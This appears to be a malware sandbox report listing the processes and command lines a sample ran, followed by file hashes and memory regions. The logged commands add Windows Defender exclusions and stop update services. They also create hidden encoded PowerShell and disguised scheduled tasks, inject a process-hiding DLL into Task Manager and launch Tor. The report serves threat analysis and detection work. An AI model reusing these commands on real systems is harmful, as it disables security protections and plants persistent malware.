"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkUCcFcjT" /SC once /ST 03:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkUCcFcjT"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gkUCcFcjT"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "AtBWxWZQPczPtNlnn" /SC once /ST 15:25:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe\" nf /Zssite_idqtN 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "AtBWxWZQPczPtNlnn"
C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe
C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe nf /Zssite_idqtN 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bSTfouYtWkypYZNMeg"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\DsPYJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "tPKRaMnTrSPPzpw2" /F /xml "C:\Program Files (x86)\KcvIfpBEU\YCgwUJq.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "tPKRaMnTrSPPzpw"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "tPKRaMnTrSPPzpw"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "adfRLMJfxNTLtT" /F /xml "C:\Program Files (x86)\AtBFliYUSCIU2\dROlsqs.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "KDnJrqmubUqQR2" /F /xml "C:\ProgramData\aFeOAQnlubilNTVB\SxVWXHC.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QrnxlXQtqLuhZDTpp2" /F /xml "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\uytAyRN.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "frJpXGSvGdttwfSkGFg2" /F /xml "C:\Program Files (x86)\OFVgegHnELnCC\DdLstpe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GZVqxQnXgrdNzWCPM" /SC once /ST 06:51:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll\",#1 /aqsite_idmwH 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "GZVqxQnXgrdNzWCPM"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "GZVqxQnXgrdNzWCPM"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "AtBWxWZQPczPtNlnn"
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
Network
Files
| SHA512 | 7cbfe87a43f859ebaafb7d4833e53fabd6b542491feb04eb9798aa69a3c91313d3280f286aeaff89bd9b6bb256841ad27c5609bdec5540744d5f24df00f386a5 |
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
| MD5 | 6d3fc2f2abab017258985e5b32fb07ef |
| SHA1 | 1f686bfb1b6f83dc70a6c6af343053d186198222 |
| SHA256 | 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0 |
| SHA512 | 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923 |
memory/4992-163-0x0000000000400000-0x0000000000965000-memory.dmp
C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
| MD5 | 7d4b677be7d62f98fd161a9dac97941e |
| SHA1 | 112f4030f205cfbffa6c1fe0b2e74f62f572a844 |
| SHA256 | e7d1b66b70af1e4408c197bbff2082873265d468f4aedc3c3c336fd635b47ca1 |
| SHA512 | 81922a9f12635cb85131a63510b9b43a548eb322bca555617c76926829123535402ebb77359b8c6964b45638545d5937d5663e82407f4c656895ea2e210592f9 |
memory/4776-171-0x00007FF7A4860000-0x00007FF7A4E01000-memory.dmp
C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
| MD5 | 6adbe8c1f705afaf91d59f32de9fa981 |
| SHA1 | 6af94d5829f6469f32d36ae852701acb800cb33e |
| SHA256 | 4145304d995415d5e3047c189a8339b65b4a0af2f2f9680f6eafd956ac55a2ff |
| SHA512 | 7cbfe87a43f859ebaafb7d4833e53fabd6b542491feb04eb9798aa69a3c91313d3280f286aeaff89bd9b6bb256841ad27c5609bdec5540744d5f24df00f386a5 |
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
| MD5 | 6d3fc2f2abab017258985e5b32fb07ef |
| SHA1 | 1f686bfb1b6f83dc70a6c6af343053d186198222 |
| SHA256 | 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0 |
| SHA512 | 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923 |
C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
| MD5 | 6adbe8c1f705afaf91d59f32de9fa981 |
| SHA1 | 6af94d5829f6469f32d36ae852701acb800cb33e |
| SHA256 | 4145304d995415d5e3047c189a8339b65b4a0af2f2f9680f6eafd956ac55a2ff |
| SHA512 | 7cbfe87a43f859ebaafb7d4833e53fabd6b542491feb04eb9798aa69a3c91313d3280f286aeaff89bd9b6bb256841ad27c5609bdec5540744d5f24df00f386a5 |
memory/4148-179-0x0000000000830000-0x0000000000D59000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252463872744.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
memory/3160-186-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
| MD5 | 7d4b677be7d62f98fd161a9dac97941e |
| SHA1 | 112f4030f205cfbffa6c1fe0b2e74f62f572a844 |
| SHA256 | e7d1b66b70af1e4408c197bbff2082873265d468f4aedc3c3c336fd635b47ca1 |
| SHA512 | 81922a9f12635cb85131a63510b9b43a548eb322bca555617c76926829123535402ebb77359b8c6964b45638545d5937d5663e82407f4c656895ea2e210592f9 |
memory/3192-167-0x0000000003490000-0x00000000034A6000-memory.dmp
memory/2276-172-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
| MD5 | 6d3fc2f2abab017258985e5b32fb07ef |
| SHA1 | 1f686bfb1b6f83dc70a6c6af343053d186198222 |
| SHA256 | 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0 |
| SHA512 | 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923 |
memory/3160-194-0x00007FFCE3B90000-0x00007FFCE3B92000-memory.dmp
memory/2744-187-0x0000000000830000-0x0000000000D59000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252453714148.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
memory/3160-197-0x00007FFCE27B0000-0x00007FFCE27B2000-memory.dmp
memory/3160-195-0x00007FFCE3BA0000-0x00007FFCE3BA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe
| MD5 | 6d3fc2f2abab017258985e5b32fb07ef |
| SHA1 | 1f686bfb1b6f83dc70a6c6af343053d186198222 |
| SHA256 | 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0 |
| SHA512 | 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923 |
memory/3160-198-0x00007FFCE27C0000-0x00007FFCE27C2000-memory.dmp
memory/3160-200-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/3160-199-0x00007FFCE18A0000-0x00007FFCE18A2000-memory.dmp
memory/3160-207-0x00007FFCE18B0000-0x00007FFCE18B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252508714144.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252508714144.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
| MD5 | b2d6071f0c13c212d6a0f7a9f0be0c3a |
| SHA1 | ae6449fb551df26e629c47bf7b40bda9a7082daa |
| SHA256 | be8d38d062dc8c047f32a300dd5b9c9bdc72834407de63c32ecac3cbb553fce2 |
| SHA512 | 5f83692311b4efd458e9c5282ae29abc5408aa0228cf16080f176252a74544f30881e8468dab3b6d6f778ae3195f194c7e9429f8421ca292c78bb0fb6059c141 |
C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
| MD5 | b2d6071f0c13c212d6a0f7a9f0be0c3a |
| SHA1 | ae6449fb551df26e629c47bf7b40bda9a7082daa |
| SHA256 | be8d38d062dc8c047f32a300dd5b9c9bdc72834407de63c32ecac3cbb553fce2 |
| SHA512 | 5f83692311b4efd458e9c5282ae29abc5408aa0228cf16080f176252a74544f30881e8468dab3b6d6f778ae3195f194c7e9429f8421ca292c78bb0fb6059c141 |
memory/4144-213-0x0000000000DC0000-0x00000000012E9000-memory.dmp
memory/4992-216-0x0000000002930000-0x0000000002931000-memory.dmp
memory/1976-221-0x0000000004730000-0x0000000004740000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252537305048.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
| MD5 | 6d3fc2f2abab017258985e5b32fb07ef |
| SHA1 | 1f686bfb1b6f83dc70a6c6af343053d186198222 |
| SHA256 | 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0 |
| SHA512 | 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923 |
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
| MD5 | 6d3fc2f2abab017258985e5b32fb07ef |
| SHA1 | 1f686bfb1b6f83dc70a6c6af343053d186198222 |
| SHA256 | 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0 |
| SHA512 | 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923 |
memory/5048-229-0x0000000000830000-0x0000000000D59000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252552934936.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | ca366089eb6c26e2b23804ee1ff6b327 |
| SHA1 | 754abadca62ba893b7bf04145346608da3940041 |
| SHA256 | dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7 |
| SHA512 | c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86 |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | ca366089eb6c26e2b23804ee1ff6b327 |
| SHA1 | 754abadca62ba893b7bf04145346608da3940041 |
| SHA256 | dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7 |
| SHA512 | c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86 |
memory/3160-240-0x00007FFCE15D0000-0x00007FFCE1899000-memory.dmp
memory/3160-241-0x00007FFCE15D0000-0x00007FFCE1899000-memory.dmp
memory/3160-239-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe
| MD5 | 24a387fda6e0f36f9af44d65487c5f5b |
| SHA1 | a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970 |
| SHA256 | b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb |
| SHA512 | f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61 |
memory/1976-243-0x0000000006C00000-0x0000000006C32000-memory.dmp
memory/1976-247-0x000000006F370000-0x000000006F3BC000-memory.dmp
memory/3160-246-0x00007FFC80030000-0x00007FFC80031000-memory.dmp
memory/3160-245-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/1976-258-0x00000000060D0000-0x00000000060EE000-memory.dmp
memory/4936-248-0x0000000000830000-0x0000000000D59000-memory.dmp
memory/4444-260-0x0000000074A30000-0x00000000751E0000-memory.dmp
memory/3808-262-0x0000000010000000-0x0000000010586000-memory.dmp
memory/3160-259-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/1976-261-0x0000000006E40000-0x0000000006EE3000-memory.dmp
memory/1976-263-0x0000000074A30000-0x00000000751E0000-memory.dmp
memory/3160-266-0x00007FFC80000000-0x00007FFC80002000-memory.dmp
memory/3160-264-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/1976-268-0x000000007EE10000-0x000000007EE20000-memory.dmp
memory/3160-270-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/3808-271-0x0000000000520000-0x0000000000C10000-memory.dmp
memory/4992-274-0x0000000000400000-0x0000000000965000-memory.dmp
memory/1976-276-0x00000000075B0000-0x0000000007C2A000-memory.dmp
memory/1976-277-0x0000000006F80000-0x0000000006F9A000-memory.dmp
memory/3160-273-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/3160-278-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/3160-282-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/3160-286-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp
memory/4036-288-0x0000000002980000-0x0000000002D81000-memory.dmp
